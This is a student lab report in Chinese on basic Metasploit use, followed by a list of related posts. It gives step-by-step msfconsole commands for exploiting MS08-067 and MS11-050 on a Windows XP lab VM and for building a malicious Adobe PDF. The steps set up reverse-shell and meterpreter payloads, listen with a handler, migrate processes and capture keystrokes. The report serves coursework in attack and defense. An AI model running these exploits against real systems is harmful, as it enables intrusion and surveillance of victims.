20145236《网络攻防》Exp5 MSF基础应用

一、基础问题回答

  • 解释exploitpayloadencode是什么:

    • exploit就是负责负载有用代码的交通工具,先通过exploit把路打通、打开以后,好让有用代码能够作用与目的地;
    • payload就是有具体功能作用的代码,能够完成具体交代的任务,即exploit所负载的东西;
    • encode就是对payload进行再编译,避免打上“危险物品切勿签收”的标签,让被攻击者一下子就知道这是病毒;

二、实验感想

这次实验运用不同的漏洞进行了攻击,其中比较纠结的攻击就是IE浏览器攻击和最后一个辅助模块的攻击。因为之前老师给出的windowsXP靶机中IE已经是更新过补丁的版本了所以导致攻击各种不成功,后来换了台虚拟机才做好了这个实验。至于辅助模块的攻击……其中有很多是靶机已经安装过补丁的,因此很容易出现攻击无效之类的事情,还有就是因为windows7虚拟机不是正版的原因导致无法下载有漏洞的更新==

并且在小实验四中我感觉盲目的寻找攻击模块太被动了,很容易像我这次实验一样各种撞墙,因为不知道靶机是否存在漏洞,可以选择用一些漏洞扫描工具扫描一下靶机再选择攻击。

从这次的实验中我深刻体会到了更新漏洞补丁是必须的,之前看系统提示漏洞补丁什么的我因为嫌麻烦都忽略了,现在看来可能早已中了什么病毒,找时间好好修补一下漏洞查杀一遍电脑吧……

三、实验过程记录

本次实验环境配置

  • 攻击机:Kali
  • 靶机:win XP SP3(English)

MS08-067漏洞攻击

Step1

  • 启用msf终端:msfconsole
  • 可以通过:search ms08_067,查找相应的漏洞
  • 找到后,会显示相应漏洞的模块,如下图所示:

Step2

  • msfconsole有一个好处,就是每一步的操作都可以提示你后续的步骤,即便不知道指令也可以通过help来查找

  • 根据上述漏洞的模块,我们可以选择相应的模块

    • use exploit/windows/smb/ms08_067_netapi
  • 接下来可以查看相应的攻击载荷,首先我们可以查看可使用的载荷

    • show payloads

  • 因为我们想要获取靶机的shell,所以可以选择以上2种攻击载荷

    • 如:set payload generic/shell_reverse_tcp
  • 注意:此处的目的是获取shell,如果想用meterpreter,找到相应的payload并设置即可

Step3

  • 查看配置渗透攻击所需的配置项

    • show options

  • 通过上述操作,可以让我们知道有哪些参数需要进行配置
set LHOST 192.168.85.129    //设置攻击IP
set RHOST 192.168.85.137 //设置靶机IP

  • 接下来可以看看有哪些合适的靶机平台

    • show targets
    • 设置相应平台的编号:set target 0
    • 此处不设置也可以,msf平台可以自动帮你从第一个开始搜索满足要求的靶机平台

Step4

  • 发起渗透攻击(在自己电脑上怎么都攻击不成功,换了另外一台KALI还是不行,后来从别人电脑直接拷了个Win XP ensp3,成功了)

    • exploit

  • kali机执行ipconfig/all

  • windows执行同样的操作

MS11-050漏洞攻击

Step1

  • 同上述步骤,第一步,查找相关漏洞信息

Step2

  • 加载相应模块

    • use windows/browser/ms11_050_mshtml_cobjectelement
  • 找到模块后,可以通过info指令查看模块详细信息

Step3

  • 加载payload

    • set payload windows/meterpreter/reverese_tcp
    • 这里采用meterpreter方式获取权限
  • 设置相应参数,通过show options查看
set URIPATH ms5236  //设置访问主页的URI
set LHOST 192.168.85.129 //设置攻击IP
set LPORT 5236 //设置攻击端口

Step4

  • 发起渗透攻击

    • exploit

  • 此时,在靶机中启动IE 7浏览器,访问链接:http://192.168.211.132:8080/ms5236

  • msf下可看见创建了一个ID为1的session

  • sessions -i 1开始连接后抓取靶机键盘

  • 获取shell

Adobe阅读器渗透攻击(针对客户端)

  • kali下打开显示隐藏文件,输入use exploit/windows/fileformat/adobe_cooltype_sing,然后输入set payload windows/meterpreter/reverse_tcp设置攻击有效载荷payloads
set LHOST "KALI Ip"

set FILENAME xxx.pdf

set LPORT xxxx

  • exploit,生成pdf文件以后拷贝到xp虚拟机

  • back返回,使用use exploit/multi/handler新建一个监听模块。

  • 使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。端口号设置和攻击模块里的数据设置相同。

  • 在靶机中打开pdf文件,相当于打开了一个后门程序,这里pdf打不开,因为其中包含了恶意代码

  • 反弹链接后成功

  • 将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号,如下图所示,使用命令migrate 992

  • 输入shell,查看xp靶机信息

应用辅助模块

Step1

  • 进入msfconsle后,通过下面相关指令查找辅助模块

    • show auxiliary

  • 选取相应的moudle,在这里选择如下:
    • use auxiliary/scanner/portscan/syn

Step2

  • 设置好相应参数,可以通过show options来查看
set RHOSTS 192.168.85.128   //设置扫描目标IP地址
set THREADS 50 //设置线程数

Step3

  • 启动:run,扫描结果如下:

20145236《网络攻防》Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  3. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  4. 20145330 《网络攻防》 MSF基础应用

    20145330 <网络攻防> MSF基础应用 1.实验后回答问题 (1)用自己的话解释什么是exploit,payload,encode. exploit:进行渗透攻击的模块合集 pay ...

  5. 《网络攻防》 MSF基础应用

    20145224陈颢文 <网络攻防>MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode: exploit:攻击手段,是能使攻击武器(payloa ...

  6. 20145239杜文超《网络攻防》- MSF基础应用

    20145239杜文超<网络攻防>- MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit:实现攻击行为的主体,但没有载荷只 ...

  7. 20145306 《网络攻防》 MSF基础应用

    20145306张文锦<网络对抗>MSF应用 Adobe阅读器渗透攻击 两台虚拟机,其中一台为kali,一台为windows xp sp3,并保证两台虚拟机可以ping通. 实验过程 进入 ...

  8. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  9. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  10. 20145334赵文豪《网络攻防》 MSF基础应用

    实践目标 掌握metasploit的基本应用方式 掌握常用的三种攻击方式的思路. 实验要求 一个主动攻击,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adob ...

随机推荐

  1. .13-浅析webpack源码之WatcherManager模块

    从模块流可以看出,这个NodeWatchFileSystem模块非常深,这里暂时不会深入到chokidar模块,有点太偏离本系列文章了,从WatcherManager开始讲解. 流程如图: 源码非常简 ...

  2. C# 类相同属性赋值

    做项目时偶尔B类赋值给A类,碰巧A和B类型很多属性字段名是一样的,或者只是大小写不一样,这是可以利用泛型,反射来写一个自动化赋值的方法. 下面方法不考虑大小写不一样的情况,如果要考虑,可以使用字符串方 ...

  3. 一道生成不重复随机数字的C#笔试编程题

    当时写在纸上的程序没有验证输入,出面试公司没多久就突然想起来这点了,囧啊! 不过当时笔试的时候想到写异常处理了. 回来上机整理了一下程序,才发现原来还会用到递归的. 当时面试官边说边出的题,问他数字是 ...

  4. 简单说一下UWP中的JumpList

    在Windows10的10856这个版本中,微软为桌面版提供了一组新的应用交互方式,磁贴和Toast通知的个性化都有了一定的改善.针对磁贴方面,微软为我们提供了一组新的API来扩充我们对应用的交互方式 ...

  5. inheritConstructorStealing.js

    // 借用构造函数 // 其基本思路是在子类型构造函数的内部调用父类型的构造函数 function Person(name){ this.name = name; this.friends = [&q ...

  6. Java字符串占位符(commons-text)替换(转载)

    Java字符串占位符(commons-text)替换 https://blog.csdn.net/varyall/article/details/83651798 <dependency> ...

  7. json替换jsonp实现跨域请求

    最近遇到h5前端页面和web后端双方的请求存在跨域,普通的jquery.ajax请求已不能实现(因为js是不允许跨域的(如果可以跨域,那就能随便改别人的网页了),js的原理), 最后经过艰苦奋斗,终于 ...

  8. [20180122]列统计与直方图.txt

    [20180122]列统计与直方图.txt --//昨天看了https://jonathanlewis.wordpress.com/2018/01/18/column-stats/,提到分析metho ...

  9. Asp.net webForm设置允许表单提交Html

    1. 在表单需要提交Html的页面头部加入  ValidateRequest="false" <%@ Page Language="C#" AutoEve ...

  10. 机器学习算法_knn(福利)

    这两天翻了一下机器学习实战这本书,算法是不错,只是代码不够友好,作者是个搞算法的,这点从代码上就能看出来.可是有些地方使用numpy搞数组,搞矩阵,总是感觉怪怪的,一个是需要使用三方包numpy,虽然 ...